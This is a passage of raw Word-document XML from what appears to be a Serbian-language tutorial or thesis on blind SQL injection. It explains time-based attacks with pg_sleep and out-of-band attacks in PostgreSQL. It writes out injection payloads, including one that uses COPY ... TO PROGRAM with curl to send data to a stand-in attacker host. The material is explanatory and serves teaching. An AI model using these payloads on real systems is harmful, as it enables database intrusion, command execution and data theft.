    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Time-based SQLi napadi predstavljaju primenu šireg koncepta poznatog kao </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Timing napadi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Timing Attacks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), klasu side-channel napada u kojima napadač meri vreme izvršavanja različitih operacija kako bi zaključio informacije o stanju sistema. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prilikom time-based napada, cilj je postaviti payload tako da u slučaju tačnog uslova dođe do namernog kašnjenja u odgovoru od strane baze podataka. Ukoliko je uslov netačan, izvršenje upita neće biti blokirano. Na ovaj način se indirektno može doći do značajnih informacija, po sličnom principu kao i kod Boolean-based napada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Koristeći primer kao i kod prethodnih tipova SQLi napada, na slici 26 je vidljiv primer payload-a koji izaziva kašnjenje ukoliko je uslov specificiranog podupita ispunjen:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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1188" cy="538109"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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691188" cy="53810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26 - Demonstracija Time-based napada</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Najpre je potrebno pojasniti svaki deo upita </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user1' OR (SELECT pg_sleep(5) FROM users WHERE username='admin') IS NULL--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6">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highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user1'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - zatvara originalni upit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Zatim se formira podupit, povezan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">operatorom. Podupit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_sleep(5) FROM users WHERE username='admin'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> proverava da li postoji red u tabeli </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gde je korisničko ime jednako ,,admin’’. Ako postoji, izvršava se pg_sleep(5), funkcija koja izaziva kašnjenje u izvršenju od prosleđenog broja sekundi, u ovom slučaju 5 sekundi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000198">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 kraju, vrednost koju vraća podupit se poredi sa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vrednošću, nakon čega se nalazi oznaka za komentar </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>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koja ignoriše ostatak originalnog upita.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Poređenje se vrši zato što </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> funkcija predstavlja </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> funkciju. Prilikom izvršenja podupita, ukoliko postoji red koji ispunjava zadat uslov, izvršiće se </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> funkcija, a zatim će </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">naredba svakako formirati red sa vrednošću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s obzirom da funkcija </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne vraća ikakvu vrednost. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ukoliko uslov nije ispunjen, rezultat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naredbe je prazan red, koji se interpretira kao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u ovom kontekstu</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, ali se funkcija </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne okida i ne dolazi do kašnjenja u izvršenju upita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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Dakle, u slučaju da ne postoji nijedan ili tačno jedan red koji zadovoljava uslov, rezultat podupita će biti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i krajnje poređenje će biti tačno, ali je svrha napada izvršenje funkcije koja izaziva kašnjenje samo ukoliko postoji jedan red koji zadovoljava uslov podupita.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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Bitno je napomenuti da bi u ovom kontekstu došlo do greške u izvršenju upita ukoliko bi uslov unutar podupita vraćao više od jednog reda. Razlog je činjenica da ovaj podupit predstavlja tzv. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scalar Subquery Expression</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, s obzirom da se nalazi nakon </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operatora i zatim poredi sa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vrednošću. Zbog toga, ovo je tip upita za koji važi da može vratiti ili nijedan ili tačno jedan red da bi se smatrao validnim i da bi se poređenje izvršilo.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Na primer, ukoliko bi podupit sadržao uslov </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE username LIKE 'user%'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, u ovom slučaju bi tri vrste zadovoljavale uslov. Naizgled bi očekivano ponašanje bilo da se upit izvrši i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> funkcija pozove ukupno tri puta, ali bi došlo do greške nakon pojavljivanja drugog reda koji ispunjuje uslov, te bi se </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> funkcija izvršila dva puta pre pojave greške.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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sličan način kao i kod Boolean-based napada se može izvršiti upit koji ispituje vrednost prvog karaktera administratorske lozinke, gde će do kašnjenja u izvršenju upita doći ako je uslov tačan, vidljivo na slici 27: </w:t>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29288" cy="413170"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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29288" cy="41317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Slika 27 - Ispitivanje vrednosti prvog karaktera lozinke primenom Time-based napada</w:t>
      </w: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pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fsi6yes09mgo" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Out-of-Band napadi </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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Prethodne kategorije Blind SQLi napada zasnivale su se na prikupljanju informacija na osnovu razlika u ponašanju aplikacije, baze podataka ili vremena izvršenja upita. Za razliku od njih, Out-of-Band napadi koriste alternativne (spoljašnje) kanale kako bi informacije iz baze podataka bile poslate napadaču.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Alternativni kanali podrazumevaju server pod kontrolom napadača, gde bi se podaci slali putem HTTP, DNS ili sličnih protokola.</w:t>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Out-of-Band napadi su korisni u situacijama kada aplikacija ne vraća korisne greške, kao i kada nema primetnih razlika u ponašanju niti vremenskom odzivu, tj. kada prethodne metode napada nisu izvodljive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Prilikom Out-of-Band napada, payload se kreira tako da baza podataka izvrši određenu akciju koja izaziva komunikaciju ka eksternom serveru napadača. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer payload-a koji koristi HTTP protokol može biti:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; COPY users TO PROGRAM 'curl -X POST http://attacker-website.com/ --data-binary “@</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;--</w:t>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PostgreSQL-u, sintaksa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY &lt;ime_tabele&gt; TO PROGRAM &lt;komanda&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> se koristi da bi se rezultati izvršene komande, najčešće fajla koji sadrži podatke, koja se nalazi nakon ključne reči </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PROGRAM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> upisali unutar zadate tabele. Međutim, ova funkcionalnost se može upotrebiti u maliciozne svrhe za pokretanje proizvoljnih sistemskih komandi. </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Iako će u većini slučajeva doći do greške prilikom izvršenja takvog upita zbog pokušaja upisa podataka u tabelu, za napadača je jedino važno da se sistemska komanda izvrši. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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primeru se izaziva pozivanje eksterne komande </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
